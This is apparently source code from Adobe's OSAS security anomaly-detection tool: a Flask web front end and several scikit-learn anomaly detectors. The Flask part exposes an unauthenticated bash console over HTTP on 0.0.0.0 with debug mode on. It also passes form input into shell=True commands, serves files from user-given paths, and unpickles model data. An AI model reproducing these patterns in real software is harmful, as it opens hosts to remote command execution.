52 | '''
53 | return text
54 |
55 |
56 | @app.route('/osas/static/<path:filename>')
57 | def assets(filename):
58 | # Add custom handling here.
59 | # Send a file download response.
60 | # print(path)
61 | print(filename)
62 | return send_file('templates/static/{0}'.format(filename))
63 |
64 |
65 | @app.route('/osas/console', methods=['GET', 'POST'])
66 | def console_print():
67 | return render_template("console.html")
68 |
69 |
70 | @app.route('/osas/console/read', methods=['GET', 'POST'])
71 | def console_read():
72 | global pty_buffer
73 | tmp = pty_buffer
74 | pty_buffer = []
75 |
76 | return ''.join([chr(c) for c in tmp])
77 |
78 |
79 | @app.route('/osas/console/size', methods=['GET', 'POST'])
80 | def console_size():
81 | xpix = 0
82 | ypix = 0
83 |
84 | global pty_fd
85 | data = request.json
86 | print(data)
87 | winsize = struct.pack("HHHH", data['row'], data['col'], xpix, ypix)
88 | fcntl.ioctl(pty_fd, termios.TIOCSWINSZ, winsize)
89 | return ''
90 |
91 |
92 | @app.route('/osas/console/write', methods=['GET', 'POST'])
93 | def console_write():
94 | data = request.json
95 | # print(data)
96 | global pty_fd
97 | data = data['asciiKey'].encode()
98 | # print(data)
99 | os.write(pty_fd, data)
100 |
101 | global pty_buffer
102 | tmp = pty_buffer
103 | pty_buffer = []
104 | # print("returning {0}".format(tmp))
105 | return ''.join([chr(c) for c in tmp])
106 |
107 |
108 | pty_fd = None
109 |
110 |
111 | def pty_read(f):
112 | global pty_fd
113 | pty_fd = f
114 |
115 | def rthread(fd):
116 | while (True):
117 | import time
118 | time.sleep(0.02)
119 | (data_ready, _, _) = select.select([fd], [], [], 0)
120 | if data_ready:
121 | global pty_buffer
122 | data = os.read(fd, 1024 * 1024)
123 | # print(str(data))
124 | pty_buffer += data # data.decode("utf-8")
125 |
126 | x = threading.Thread(target=rthread, args=(f,), daemon=True)
127 | x.start()
128 |
129 |
130 | # def pty_start():
131 | # pty.spawn("bash", pty_read)
132 | #
133 | #
134 | # x = threading.Thread(target=pty_start, args=(), daemon=True)
135 | # x.start()
136 |
137 | (child_pid, fd) = pty.fork()
138 | if child_pid == 0:
139 | # this is the child process fork.
140 | # anything printed here will show up in the pty, including the output
141 | # of this subprocess
142 | subprocess.run("bash")
143 | else:
144 | # this is the parent process fork.
145 | # store child fd and pid
146 | # app.config["fd"] = fd
147 | # app.config["child_pid"] = child_pid
148 | # set_winsize(fd, 50, 50)
149 | pty_fd = fd
150 | os.write(pty_fd, 'export TERM=xterm\n'.encode())
151 | cmd = " ".join(shlex.quote(c) for c in "bash")
152 | print("child pid is", child_pid)
153 | print(
154 | f"starting background task with command `{cmd}` to continously read "
155 | "and forward pty output to client"
156 | )
157 | # socketio.start_background_task(target=read_and_forward_pty_output)
158 | print("task started")
159 | print(pty_fd)
160 | pty_read(pty_fd)
161 |
162 |
163 | @app.route('/osas/generate_config', methods=['GET', 'POST'])
164 | def generate_config():
165 | print(request.method)
166 | if request.method == 'GET':
167 | onlyfiles = [f for f in listdir(data_path) if
168 | isfile(join(data_path, f)) and '.conf' not in f and 'pipeline' not in f and '.model' not in f]
169 | files = onlyfiles
170 |
171 | return render_template("generate_config.html", files=files, len=len(files))
172 |
173 | if request.method == 'POST':
174 | data = request.form.to_dict()
175 | # print(data)
176 | input = data['input']
177 | output = data['output']
178 | print(input)
179 | print(output)
180 | if '.conf' not in output:
181 | output += '.conf'
182 |
183 | def inner():
184 | proc = subprocess.Popen(['python3 osas/main/autoconfig.py --input-file={} --output-file={} 2>&1'.format(
185 | data_path + input, data_path + output)], shell=True, stdout=subprocess.PIPE)
186 |
187 | for line in iter(proc.stdout.readline, ''):
188 | try:
189 | yield line.rstrip().decode('ascii') + ' \n'
190 | except:
191 | a = None
192 | poll = proc.poll()
193 | if poll is not None:
194 | yield 'DONE! \n'
195 | full_text = """go to http://127.0.0.1:8888/osas/confirm_config
196 | """
201 | # yield 'go to http://127.0.0.1:8888/osas/confirm_config'
202 | yield full_text
203 | break
204 |
205 | #
206 | return Response(inner(), mimetype='text/html')
207 | # return request.data
208 |
209 |
210 | @app.route('/osas/confirm_config', methods=['GET', 'POST'])
211 | def confirm_config():
212 | config = configparser.ConfigParser()
213 | print(request.method)
214 |
215 | if request.method == 'GET':
216 | onlyfiles = [f for f in listdir(data_path) if
217 | isfile(join(data_path, f)) and '.conf' in f and 'pipeline' not in f]
218 | files = onlyfiles
219 | return render_template("config_manual_update.html", files=files, len=len(files))
220 |
221 | if request.method == 'POST':
222 | print(request.form)
223 | print('here')
224 | input = request.form['input']
225 | try:
226 | output = request.form['output']
227 | except:
228 | output = None
229 | try:
230 | text_box = request.form['text_box']
231 | except:
232 | text_box = None
233 |
234 | if output == None and text_box == None:
235 | files = [str(input)]
236 | config_data = 'data'
237 | config.read(data_path + input)
238 | # print(config.sections())
239 | config_obj = []
240 | for section in config.sections():
241 | elem = []
242 | if section == 'AnomalyScoring':
243 | a = 1
244 | else:
245 |
246 | elem.append(section)
247 | elem.append(config[section]['generator_type'])
248 | try:
249 | elem.append(config[section]['field_name'])
250 | except:
251 | elem.append(config[section]['field_names'])
252 |
253 | config_obj.append(elem)
254 |
255 | # print(config_obj)
256 | output = "tailored_" + input.replace('.conf', '')
257 | Anomaly_list = ['StatisticalNGramAnomaly', 'SVDAnomaly', 'LOFAnomaly', 'IFAnomaly', 'SupervisedClassifierAnomaly']
258 | return render_template("config_manual_update.html", files=files, len=len(files), config=config_data,
259 | input=input, config_obj=config_obj, len_config=len(config_obj),
260 | anomaly_alg=Anomaly_list, output=output)
261 |
262 | elif output != None:
263 | data = request.form.to_dict()
264 | output = data['output'] + '.conf'
265 | data.pop('output')
266 | input = data['input']
267 | data.pop('input')
268 | Anomaly = data['Anomaly']
269 | data.pop('Anomaly')
270 | ground_truth_column = data['ground-truth-column']
271 | data.pop('ground-truth-column')
272 | classifier = data['classifier']
273 | data.pop('classifier')
274 | model_args = data['model-args']
275 | data.pop('model-args')
276 | labels = list(data.keys())
277 | print(labels)
278 |
279 | config.read(data_path + input)
280 | new_config = configparser.ConfigParser()
281 | for label in labels:
282 | print(config[label])
283 | new_config[label] = config[label]
284 | new_config['AnomalyScoring'] = config['AnomalyScoring']
285 | new_config['AnomalyScoring']['scoring_algorithm'] = Anomaly
286 | if Anomaly == 'SupervisedClassifierAnomaly':
287 | new_config['AnomalyScoring']['ground_truth_column'] = ground_truth_column
288 | new_config['AnomalyScoring']['classifier'] = classifier
289 | model_args = model_args.split('\n')
290 | for model_arg in model_args:
291 | model_arg = model_arg.split('=')
292 | new_config['AnomalyScoring'][model_arg[0].strip()] = model_arg[1].strip()
293 | with open(data_path + output, 'w') as configfile:
294 | new_config.write(configfile)
295 | input_data = open('osas/templates/config_static.txt', 'r').read() + "\n\n" + open(data_path + output,
296 | 'r').read()
297 | print(output)
298 | # print(input_data)
299 | return render_template("config_text_edit.html", input=[output], input_data=input_data)
300 |
301 | elif output == None and text_box != None:
302 | data = request.form.to_dict()
303 | input = data['input']
304 | text_box = data['text_box']
305 |
306 | with open(data_path + input, 'w') as configfile:
307 | configfile.write(text_box)
308 | return ''
309 |
310 |
311 | @app.route('/osas/train_pipeline', methods=['GET', 'POST'])
312 | def train_pipeline():
313 | print(request.method)
314 | if request.method == 'GET':
315 | onlyfiles = [f for f in listdir(data_path) if isfile(join(data_path, f)) and '.conf' in f and '.model' not in f]
316 | files = onlyfiles
317 |
318 | onlyfiles_dataset = [f for f in listdir(data_path) if
319 | isfile(join(data_path, f)) and '.conf' not in f and '.model' not in f]
320 | dataset = onlyfiles_dataset
321 |
322 | return render_template("train_pipeline.html", files=files, len=len(files), dataset=dataset,
323 | len_dataset=len(dataset))
324 |
325 | if request.method == 'POST':
326 | input = request.form['input']
327 | input_conf = request.form['input_conf']
328 |
329 | output = request.form['output']
330 | print(input)
331 | print(output)
332 | if '.model' not in output:
333 | output += '.model'
334 |
335 | def inner():
336 | proc = subprocess.Popen([
337 | 'python3 osas/main/train_pipeline.py --input-file={} --conf-file={} --model-file={} 2>&1'.format(
338 | data_path + input, data_path + input_conf, data_path + output)], shell=True,
339 | stdout=subprocess.PIPE)
340 |
341 | for line in iter(proc.stdout.readline, ''):
342 | try:
343 | yield line.rstrip().decode('ascii') + ' \n'
344 | except:
345 | a = None
346 | poll = proc.poll()
347 | if poll is not None:
348 | yield 'DONE! \n'
349 | # yield 'go to http://127.0.0.1:8888/osas/run_pipeline'
350 | full_text = """go to http://127.0.0.1:8888/osas/run_pipeline
351 | """
356 | yield full_text
357 | break
358 |
359 | #
360 | return Response(inner(), mimetype='text/html')
361 |
362 |
363 | @app.route('/osas/run_pipeline', methods=['GET', 'POST'])
364 | def run_pipeline():
365 | print(request.method)
366 | if request.method == 'GET':
367 | onlyfiles = [f for f in listdir(data_path) if
368 | isfile(join(data_path, f)) and '.conf' in f and 'pipeline' not in f]
369 | files = onlyfiles
370 |
371 | onlyfiles_dataset = [f for f in listdir(data_path) if
372 | isfile(join(data_path, f)) and '.conf' not in f and '.model' not in f]
373 | dataset = onlyfiles_dataset
374 |
375 | onlyfiles_dataset = [f for f in listdir(data_path) if isfile(join(data_path, f)) and '.model' in f]
376 | pipeline = onlyfiles_dataset
377 |
378 | return render_template("run_pipeline.html", files=files, len=len(files), dataset=dataset,
379 | len_dataset=len(dataset), pipeline=pipeline, len_pipeline=len(pipeline))
380 |
381 | if request.method == 'POST':
382 | input = request.form['input']
383 | input_conf = request.form['input_conf']
384 | model_conf = request.form['model_conf']
385 |
386 | output = request.form['output']
387 | print(input)
388 | print(output)
389 | if '.csv' not in output:
390 | output += '.csv'
391 |
392 | def inner():
393 | proc = subprocess.Popen([
394 | 'python3 osas/main/run_pipeline.py --input-file={} --conf-file={} --model-file={} --output-file={} 2>&1'.format(
395 | data_path + input, data_path + input_conf, data_path + model_conf,
396 | data_path + output)], shell=True, stdout=subprocess.PIPE)
397 |
398 | for line in iter(proc.stdout.readline, ''):
399 | try:
400 | yield line.rstrip().decode('ascii') + ' \n'
401 | except:
402 | a = None
403 | poll = proc.poll()
404 | if poll is not None:
405 | yield 'DONE! \n'
406 | # yield 'go to kibana http://127.0.0.1:5601'
407 | full_text = """go to http://127.0.0.1:5601
408 | """
413 | yield full_text
414 |
415 | break
416 |
417 | #
418 | return Response(inner(), mimetype='text/html')
419 |
420 |
421 | @app.route('/osas/run_full_process', methods=['GET', 'POST'])
422 | def run_full_process():
423 | print(request.method)
424 | if request.method == 'GET':
425 | onlyfiles = [f for f in listdir(data_path) if
426 | isfile(join(data_path, f)) and '.conf' not in f and '.model' not in f]
427 | files = onlyfiles
428 |
429 | return render_template("run_full_process.html", files=files, len=len(files))
430 |
431 | if request.method == 'POST':
432 | input = request.form['input']
433 | output = request.form['output']
434 | print(input)
435 | print(output)
436 | if '.csv' not in output:
437 | output += '.csv'
438 |
439 | def inner():
440 | import datetime
441 | stamp = str(datetime.datetime.now())[0:19].replace(' ', '_').replace(':', '_')
442 | key = input.split('.')[0] + "_" + stamp
443 | commands = []
444 | commands.append(
445 | 'python3 osas/main/autoconfig.py --input-file={} --output-file={}.conf 2>&1'.format(data_path + input,
446 | data_path + key))
447 | commands.append(
448 | 'python3 osas/main/train_pipeline.py --input-file={} --conf-file={}.conf --model-file={}.model 2>&1'.format(
449 | data_path + input, data_path + key, data_path + key))
450 | commands.append(
451 | 'python3 osas/main/run_pipeline.py --input-file={} --conf-file={}.conf --model-file={}.model --output-file={} 2>&1'.format(
452 | data_path + input, data_path + key, data_path + key, data_path + output))
453 |
454 | for command in commands:
455 | yield command + ' \n' + ' \n'
456 | proc = subprocess.Popen([command], shell=True, stdout=subprocess.PIPE)
457 |
458 | for line in iter(proc.stdout.readline, ''):
459 |
460 | try:
461 | yield line.rstrip().decode('ascii') + ' \n'
462 | except:
463 | a = None
464 | poll = proc.poll()
465 | if poll is not None:
466 | yield 'DONE! \n'
467 | yield 'NEXT: \n'
468 | break
469 | yield 'go to kibana http://127.0.0.1:5601'
470 |
471 | #
472 | return Response(inner(), mimetype='text/html')
473 |
474 |
475 | app.run(port=8888, host='0.0.0.0', debug=True)
476 |
--------------------------------------------------------------------------------
/src/osas/core/anomaly.py:
--------------------------------------------------------------------------------
1 | #
2 | # Authors: Security Intelligence Team within the Security Coordination Center
3 | #
4 | # Copyright (c) 2018 Adobe Systems Incorporated. All rights reserved.
5 | #
6 | # Licensed under the Apache License, Version 2.0 (the "License");
7 | # you may not use this file except in compliance with the License.
8 | # You may obtain a copy of the License at
9 | #
10 | # http://www.apache.org/licenses/LICENSE-2.0
11 | #
12 | # Unless required by applicable law or agreed to in writing, software
13 | # distributed under the License is distributed on an "AS IS" BASIS,
14 | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
15 | # See the License for the specific language governing permissions and
16 | # limitations under the License.
17 | #
18 |
19 | import sys
20 | import ast
21 | import numpy as np
22 | import tqdm
23 | from sklearn.preprocessing import MultiLabelBinarizer
24 | from sklearn.decomposition import TruncatedSVD
25 | from sklearn.neighbors import LocalOutlierFactor
26 | from sklearn.ensemble import IsolationForest
27 | import json
28 | import pickle
29 | import base64
30 | import importlib
31 |
32 | sys.path.append('')
33 | from osas.core.interfaces import AnomalyDetection, Datasource
34 |
35 |
36 | class IFAnomaly(AnomalyDetection):
37 | """
38 |     Uses an Isolation Forest to detect anomalies
39 | """
40 |
41 | def __init__(self):
42 | super().__init__()
43 | self._model = None
44 | self._data_encoder = None
45 | self._decompose = None
46 |
47 | def build_model(self, dataset: Datasource, incremental=False) -> dict:
48 | data_encoder = MultiLabelBinarizer()
49 | labels = []
50 | for item in dataset:
51 | labels.append(item['_labels'])
52 | data_encoded = data_encoder.fit_transform(labels)
53 | self._data_encoder = data_encoder
54 |
55 | decompose = TruncatedSVD(n_components=4, n_iter=7, random_state=42)
56 | data_decomposed = decompose.fit_transform(data_encoded)
57 | self._decompose = decompose
58 |
59 | iso_forest = IsolationForest(random_state=0, n_jobs=4)
60 | iso_forest.fit(data_decomposed)
61 |
62 | self._model = iso_forest
63 |
64 | model = {'encoder': self._data_encoder,
65 | 'SVD': self._decompose,
66 | 'iso_forest': self._model
67 | }
68 | out_model = base64.b64encode(pickle.dumps(model)).decode('ascii')
69 | model = {'model': out_model}
70 | return model
71 |
72 | def __call__(self, dataset: Datasource, verbose=True) -> [float]:
73 |
74 | labels = []
75 | for item in dataset:
76 | labels.append(item['_labels'])
77 | data_encoded = self._data_encoder.transform(labels)
78 | data_decomposed = self._decompose.transform(data_encoded)
79 | scores = self._model.score_samples(data_decomposed)
80 |
81 | return -scores
82 |
83 | @staticmethod
84 | def from_pretrained(pretrained: str) -> AnomalyDetection:
85 | tmp = json.loads(pretrained)
86 | pre_model = pickle.loads(base64.b64decode(tmp['model']))
87 | model = IFAnomaly()
88 | model._data_encoder = pre_model['encoder']
89 | model._decompose = pre_model['SVD']
90 | model._model = pre_model['iso_forest']
91 |
92 | return model
93 |
94 |
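All detectors in this module share the same persistence pattern: build_model returns a dict whose 'model' entry is a base64-encoded pickle, and from_pretrained expects that dict serialized as JSON. A minimal round-trip sketch, assuming a hypothetical CSV whose '_labels' column holds stringified label lists (mirroring the __main__ block at the end of this file):

import ast
import json

from osas.data.datasources import CSVDataSource

# Hypothetical CSV; '_labels' is assumed to contain stringified lists, e.g. "['UNSEEN_USER_PAIR']".
data = CSVDataSource('corpus/train_tags.csv')
data._data['_labels'] = data._data['_labels'].apply(ast.literal_eval)

detector = IFAnomaly()
serialized = json.dumps(detector.build_model(data))  # {'model': '<base64-encoded pickle>'}

# Restore later (or in another process) and score new data; higher score = more anomalous.
restored = IFAnomaly.from_pretrained(serialized)
scores = restored(data)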
95 | class LOFAnomaly(AnomalyDetection):
96 | """
97 | Uses LOF to detect anomalies
98 | """
99 |
100 | def __init__(self):
101 | super().__init__()
102 | self._model = None
103 | self._data_encoder = None
104 | self._decompose = None
105 |
106 | def build_model(self, dataset: Datasource, incremental=False) -> dict:
107 | data_encoder = MultiLabelBinarizer()
108 | labels = []
109 | for item in dataset:
110 | labels.append(item['_labels'])
111 | data_encoded = data_encoder.fit_transform(labels)
112 | self._data_encoder = data_encoder
113 |
114 | decompose = TruncatedSVD(n_components=4, n_iter=7, random_state=42)
115 | data_decomposed = decompose.fit_transform(data_encoded)
116 | self._decompose = decompose
117 |
118 | lof = LocalOutlierFactor(n_neighbors=10, n_jobs=4, novelty=True)
119 | lof.fit(data_decomposed)
120 |
121 | self._model = lof
122 |
123 | model = {'encoder': self._data_encoder,
124 | 'SVD': self._decompose,
125 | 'LOF': self._model
126 | }
127 |
128 | out_model = base64.b64encode(pickle.dumps(model)).decode('ascii')
129 | model = {'model': out_model}
130 | return model
131 |
132 | def __call__(self, dataset: Datasource, verbose=True) -> [float]:
133 |
134 | labels = []
135 | for item in dataset:
136 | labels.append(item['_labels'])
137 | data_encoded = self._data_encoder.transform(labels)
138 | data_decomposed = self._decompose.transform(data_encoded)
139 | scores = self._model.score_samples(data_decomposed)
140 |
141 | return -scores
142 |
143 | @staticmethod
144 | def from_pretrained(pretrained: str) -> AnomalyDetection:
145 | tmp = json.loads(pretrained)
146 | pre_model = pickle.loads(base64.b64decode(tmp['model']))
147 | model = LOFAnomaly()
148 | model._data_encoder = pre_model['encoder']
149 | model._decompose = pre_model['SVD']
150 | model._model = pre_model['LOF']
151 |
152 | return model
153 |
154 |
155 | class SVDAnomaly(AnomalyDetection):
156 | """
157 |     Uses truncated SVD reconstruction error to compute the anomaly score
158 | """
159 |
160 | def __init__(self):
161 | super().__init__()
162 | self._data_encoder = None
163 | self._model = None
164 |
165 | def build_model(self, dataset: Datasource, incremental=False) -> dict:
166 |
167 | labels = []
168 | for item in dataset:
169 | tmp = []
170 | for label in item['_labels']:
171 | if isinstance(label, str):
172 | tmp.append(label)
173 | labels.append(tmp)
174 |
175 | if not incremental:
176 | data_encoder = MultiLabelBinarizer()
177 | data_encoded = data_encoder.fit_transform(labels)
178 | else:
179 | data_encoder = self._data_encoder
180 | data_encoded = data_encoder.transform(labels)
181 | self._data_encoder = data_encoder
182 | if not incremental:
183 | decompose = TruncatedSVD(n_components=4, n_iter=50, random_state=42)
184 | decompose.fit(data_encoded)
185 | else:
186 | decompose = self._model
187 | decompose.partial_fit(data_encoded)
188 |
189 | self._model = decompose
190 |
191 | model = {'encoder': self._data_encoder,
192 | 'SVD': self._model}
193 |
194 | out_model = base64.b64encode(pickle.dumps(model)).decode('ascii')
195 | model = {'model': out_model}
196 | return model
197 |
198 | def __call__(self, dataset: Datasource, verbose=True) -> [float]:
199 |
200 | labels = []
201 | for item in dataset:
202 | labels.append(item['_labels'])
203 | data_encoded = self._data_encoder.transform(labels)
204 | data_decomposed = self._model.transform(data_encoded)
205 | data_reconstruct = self._model.inverse_transform(data_decomposed)
206 |
207 | difference = data_encoded - data_reconstruct
208 | power = np.sum(difference ** 2, axis=1)
209 | error = np.sqrt(power)
210 |
211 | return error
212 |
213 | @staticmethod
214 | def from_pretrained(pretrained: str) -> AnomalyDetection:
215 | tmp = json.loads(pretrained)
216 | pre_model = pickle.loads(base64.b64decode(tmp['model']))
217 | model = SVDAnomaly()
218 | model._data_encoder = pre_model['encoder']
219 | model._model = pre_model['SVD']
220 |
221 | return model
222 |
223 |
224 | class StatisticalNGramAnomaly(AnomalyDetection):
225 | """
226 |     Uses statistical n-gram frequencies over label combinations to compute the anomaly score
227 | """
228 |
229 | def __init__(self):
230 | super().__init__()
231 | self._model = None
232 |
233 | def build_model(self, dataset: Datasource, incremental=False) -> dict:
234 | if not incremental:
235 | model = {
236 | '1': {'TOTAL': 0},
237 | '2': {'TOTAL': 0},
238 | '3': {'TOTAL': 0}
239 | }
240 | else:
241 | model = self._model
242 | # for clarity, this code is written explicitly
243 | for item in tqdm.tqdm(dataset, ncols=100, desc="\tbuilding model"):
244 | tags = item['_labels']
245 | string_tags = []
246 | for tag in tags:
247 | if isinstance(tag, str):
248 | string_tags.append(tag)
249 | tags = string_tags
250 | tags = list(sorted(tags))
251 | # unigrams
252 | grams = model['1']
253 | for ii in range(len(tags)):
254 | key = '(' + str(tags[ii]) + ')'
255 | if key in grams:
256 | grams[key]['COUNT'] += 1
257 | else:
258 | grams[key] = {'COUNT': 1}
259 | grams['TOTAL'] += 1
260 |
261 | # bigrams
262 | grams = model['2']
263 |
264 | for ii in range(len(tags) - 1):
265 | for jj in range(ii + 1, len(tags)):
266 | key = '(' + str(tags[ii]) + ',' + str(tags[jj]) + ')'
267 | if key in grams:
268 | grams[key]['COUNT'] += 1
269 | else:
270 | grams[key] = {'COUNT': 1}
271 | grams['TOTAL'] += 1
272 |
273 | # trigrams
274 | grams = model['3']
275 |
276 | for ii in range(len(tags) - 2):
277 | for jj in range(ii + 1, len(tags) - 1):
278 | for kk in range(jj + 1, len(tags)):
279 | key = '(' + str(tags[ii]) + ',' + str(tags[jj]) + ',' + str(tags[kk]) + ')'
280 | if key in grams:
281 | grams[key]['COUNT'] += 1
282 | else:
283 | grams[key] = {'COUNT': 1}
284 | grams['TOTAL'] += 1
285 |
286 | # convert to probs and log-probs
287 | for g in ['1', '2', '3']:
288 | grams = model[g]
289 | total = grams['TOTAL']
290 | for key in grams:
291 | if key != 'TOTAL':
292 | grams[key]['PROB'] = grams[key]['COUNT'] / total
293 | grams[key]['NEG_LOG_PROB'] = -np.log(grams[key]['PROB'])
294 | self._model = model
295 |
296 | out_model = base64.b64encode(pickle.dumps(model)).decode('ascii')
297 | model = {'model': out_model}
298 | return model
299 |
300 | def __call__(self, dataset: Datasource, verbose=True) -> [float]:
301 |
302 | def _build_feats(tags):
303 | feats = []
304 | string_tags = []
305 | perp_score = 0
306 | for tag in tags:
307 | if isinstance(tag, str):
308 | string_tags.append(tag)
309 | else:
310 | perp_score += tag
311 | tags = string_tags
312 | tags = list(sorted(tags))
313 |
314 | for ii in range(len(tags)):
315 | feats.append([tags[ii]])
316 | for ii in range(len(tags) - 1):
317 | for jj in range(ii + 1, len(tags)):
318 | feats.append([tags[ii], tags[jj]])
319 |
320 | for ii in range(len(tags) - 2):
321 | for jj in range(ii + 1, len(tags) - 1):
322 | for kk in range(jj + 1, len(tags)):
323 | feats.append([tags[ii], tags[jj], tags[kk]])
324 | new_feats = []
325 | for feat in feats:
326 | mid = "(" + ",".join(feat) + ")"
327 | new_feats.append(mid)
328 | return new_feats, perp_score
329 |
330 | def _compute_score(ngram2score, tags, handle_unseen=True):
331 | feats, perp_score = _build_feats(tags)
332 |
333 | score = 0
334 | for feat in feats:
335 | found = False
336 | if feat in ngram2score['1']:
337 | score += ngram2score['1'][feat]['NEG_LOG_PROB']
338 | found = True
339 | elif feat in ngram2score['2']:
340 | score += ngram2score['2'][feat]['NEG_LOG_PROB']
341 | found = True
342 | elif feat in ngram2score['3']:
343 | score += ngram2score['3'][feat]['NEG_LOG_PROB']
344 | found = True
345 | if not found:
346 | if handle_unseen:
347 | import math
348 | score += -math.log(1e-8)
349 | return score + perp_score
350 |
351 | scores = []
352 | if verbose:
353 | pgb = tqdm.tqdm(dataset, ncols=100, desc="\tscoring data")
354 | else:
355 | pgb = dataset
356 | for item in pgb:
357 | scores.append(_compute_score(self._model, item['_labels']))
358 |
359 | return scores
360 |
361 | @staticmethod
362 | def from_pretrained(pretrained: str) -> AnomalyDetection:
363 | tmp = json.loads(pretrained)
364 | pre_model = pickle.loads(base64.b64decode(tmp['model']))
365 | model = StatisticalNGramAnomaly()
366 | model._model = pre_model
367 |
368 | return model
369 |
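To make the scoring rule above concrete: each sorted tag combination (unigram, pair, triple) contributes its negative log probability, unseen combinations contribute -log(1e-8), and numeric tags (e.g. perplexity values emitted by other generators) are added directly to the score. A hedged worked example with made-up counts:

import math

# Hypothetical model counts after build_model (made-up numbers for illustration):
# '(A)' seen 100 times out of 1000 unigrams, '(B)' 10 times, '(A,B)' 5 times out of 500 pairs.
neg_log_prob = {
    '(A)': -math.log(100 / 1000),
    '(B)': -math.log(10 / 1000),
    '(A,B)': -math.log(5 / 500),
}

# An event tagged ['A', 'B'] expands to the feats ['(A)', '(B)', '(A,B)'].
score = neg_log_prob['(A)'] + neg_log_prob['(B)'] + neg_log_prob['(A,B)']

# Each unseen feat would instead add a fixed penalty of -log(1e-8).
unseen_penalty = -math.log(1e-8)
print(round(score, 3), round(unseen_penalty, 3))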
370 |
371 | class SupervisedClassifierAnomaly(AnomalyDetection):
372 | def __init__(self):
373 | super().__init__()
374 | self.BINARY_GROUND_TRUTHS1 = {'clean', 'bad'}
375 | self.BINARY_GROUND_TRUTHS2 = {0, 1}
376 | self.BINARY_IND_TO_GROUND_TRUTH1 = ['clean', 'bad']
377 | self.BINARY_IND_TO_GROUND_TRUTH2 = [0, 1]
378 |
379 | self._model = None
380 | self._encoder = None
381 | self._is_binary_preds = False
382 | self._ind_to_ground_truth = None
383 |
384 | def build_model(self, dataset: Datasource, ground_truth_column: str, classifier: str, init_args: dict,
385 | incremental=False) -> dict:
386 | labels = []
387 | ground_truth_values = set()
388 | for item in dataset:
389 | labels.append(item['_labels'])
390 | ground_truth_values.add(item[ground_truth_column])
391 | if not incremental:
392 | encoder = MultiLabelBinarizer()
393 | labels_enc = encoder.fit_transform(labels)
394 | else:
395 | encoder = self._encoder
396 | labels_enc = encoder.transform(labels)
397 |
398 | # set binary preds
399 | if ground_truth_values == self.BINARY_GROUND_TRUTHS1:
400 |             # all ground truth labels either clean or bad
401 | self._is_binary_preds = True
402 | ind_to_ground_truth = self.BINARY_IND_TO_GROUND_TRUTH1 # set bad to index 1
403 | elif ground_truth_values == self.BINARY_GROUND_TRUTHS2:
404 |             # all ground truth labels either 0 or 1
405 | self._is_binary_preds = True
406 | ind_to_ground_truth = self.BINARY_IND_TO_GROUND_TRUTH2 # set 1 to index 1
407 | else:
408 | # ground truth labels can be anything
409 | self._is_binary_preds = False
410 | ind_to_ground_truth = list(ground_truth_values)
411 |
412 | # convert ground truth values to indices
413 | ground_truth_to_ind = dict()
414 | for i in range(len(ind_to_ground_truth)):
415 | ground_truth_to_ind[ind_to_ground_truth[i]] = i
416 | model_ground_truths = []
417 | for item in dataset:
418 | gt = item[ground_truth_column]
419 | model_ground_truths.append(ground_truth_to_ind[gt])
420 |
421 | # get the classifier
422 | if not incremental:
423 | try:
424 | clf_parts = classifier.split('.')
425 | assert clf_parts[0] == 'sklearn'
426 | sk_pkg = importlib.import_module('{:s}.{:s}'.format(clf_parts[0], clf_parts[1]))
427 | clf_class = getattr(sys.modules[sk_pkg.__name__], clf_parts[2])
428 |             except Exception:
429 |                 raise Exception(
430 |                     'expected classifier to be in sklearn package format: sklearn.<module>.<class> (ex. sklearn.linear_model.LogisticRegression)')
431 | clf = clf_class(**init_args) # dict unpacking for init args
432 | clf.fit(labels_enc, model_ground_truths)
433 | else:
434 | clf = self._model
435 | clf.partial_fit(labels_enc, model_ground_truths)
436 |
437 | # return model
438 | self._encoder = encoder
439 | self._ind_to_ground_truth = ind_to_ground_truth
440 | self._model = clf
441 | model = {
442 | 'encoder': self._encoder,
443 | 'ind_to_ground_truth': ind_to_ground_truth,
444 | 'is_binary_preds': self._is_binary_preds,
445 | 'classifier': self._model
446 | }
447 | out_model = base64.b64encode(pickle.dumps(model)).decode('ascii')
448 | model = {'model': out_model}
449 | return model
450 |
451 | def __call__(self, dataset: Datasource, verbose=True) -> [float]:
452 | labels = []
453 | for item in dataset:
454 | labels.append(item['_labels'])
455 | labels_enc = self._encoder.transform(labels)
456 |
457 | preds = self._model.predict_proba(labels_enc)
458 | if self._is_binary_preds:
459 | # return the "bad" prob
460 | preds = [pred[1] for pred in preds]
461 | else:
462 | # return the class with most prob
463 | preds = [self._ind_to_ground_truth[np.argmax(pred)] for pred in preds]
464 | return preds
465 |
466 | @staticmethod
467 | def from_pretrained(pretrained: str) -> AnomalyDetection:
468 | tmp = json.loads(pretrained)
469 | pre_model = pickle.loads(base64.b64decode(tmp['model']))
470 | model = SupervisedClassifierAnomaly()
471 | model._encoder = pre_model['encoder']
472 | model._ind_to_ground_truth = pre_model['ind_to_ground_truth']
473 | model._is_binary_preds = pre_model['is_binary_preds']
474 | model._model = pre_model['classifier']
475 |
476 | return model
477 |
478 |
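The classifier argument above is resolved dynamically with importlib, so it must be a fully qualified sklearn path. A minimal sketch, assuming a hypothetical CSV with a stringified '_labels' column and a 'label' ground-truth column containing 'clean'/'bad':

import ast
from osas.data.datasources import CSVDataSource

# Hypothetical labeled dataset.
data = CSVDataSource('corpus/labeled_events.csv')
data._data['_labels'] = data._data['_labels'].apply(ast.literal_eval)

detector = SupervisedClassifierAnomaly()
detector.build_model(
    dataset=data,
    ground_truth_column='label',
    classifier='sklearn.linear_model.LogisticRegression',  # must be a full sklearn.<module>.<class> path
    init_args={'max_iter': 1000}
)
# With binary ground truth, __call__ returns the probability of the 'bad' class per row.
probs = detector(data)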
479 | if __name__ == "__main__":
480 | from osas.data.datasources import CSVDataSource
481 |
482 | data_source = CSVDataSource('corpus/hubble_test_tags.csv')
483 |
484 |
485 |     def converter(x):
486 | return ast.literal_eval(x)
487 |
488 |
489 |     data_source._data['_labels'] = data_source._data['_labels'].apply(lambda x: converter(x))
490 |
491 | model = StatisticalNGramAnomaly()
492 | tmp = model.build_model(data_source)
493 | tmp = json.dumps(tmp)
494 | model2 = StatisticalNGramAnomaly.from_pretrained(tmp)
495 | scores = model(data_source)
496 |
497 | scores2 = model2(data_source)
498 | import operator
499 |
500 | dd = {}
501 | from ipdb import set_trace
502 |
503 | for ex, score in zip(data_source, scores):
504 | dd[",".join(ex['_labels'])] = score
505 | sorted_x = sorted(dd.items(), key=operator.itemgetter(1))
506 |
507 | set_trace()
508 |
--------------------------------------------------------------------------------
/src/osas/core/label_generators.py:
--------------------------------------------------------------------------------
1 | #
